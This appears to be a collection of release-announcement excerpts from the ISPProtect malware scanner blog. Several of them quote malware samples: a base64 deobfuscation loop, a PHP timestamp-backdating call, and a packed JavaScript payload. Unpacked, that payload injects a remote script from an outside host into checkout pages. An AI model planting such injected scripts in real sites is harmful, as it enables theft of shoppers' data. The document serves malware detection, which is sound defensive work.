Author: Marius Burkard

Today we released version 1.24.7 of ISPProtect. The new version contains new heuristics to recognize further malicious code. Following we take a closer look at some malicious code snippet. $a = base64_decode($b); for($i = 0; $i < strlen($a); $i++){ $a[$i]

Today we released a new version of ISPProtect that contains improved malware heuristics. It focusses on malware that tries to hide itself or created files by setting file modification types to somewhat in the past. E. g.: <?php touch(‘/path/to/file’, time()

Today we released version 1.23.0 of our malware scanning tool. With this release we added a feature to “unpack” some JavaScripts that were minified. For example: eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘1.4=5(){6((2 7(\’8|9|a\’)).b(1.c)){$$(\’d\’)[0].e(2 f(\’g\’,{h:\’i/j\’,k:\’l://m.n.o/p/3/q/r.3\’}))}}’,28,28,’|window|new|js|onload|function|if|RegExp|onepage|checkout|onestep|test|location|head|appendChild|Element|script|type|text|javascript|src|https|boutique|postedecoute|ca|media|shipping|ups’.split(‘|’),0,{})); will be unpacked to window.onload=function(){if((new RegExp(‘onepage|checkout|onestep’)).test(window.location)){$$(‘head’)[0].appendChild(new Element(‘script’,{type:’text/javascript’,src:’https://boutique.postedecoute.ca/media/js/shipping/ups.js’}))}}

Today we released version 1.21.1 of our malware scanner ISPProtect. It adds further improvements and new signatures for an even better malware recognition. With this blog post we want to show you a crypted, let’s say creative, type of malware.

Today we released version 1.19.0 of the ISPProtect malware scanner. For this release we focussed on new malware signatures and a further improvement of scanning speed in level 2. We managed to lower the scan time to less than 50%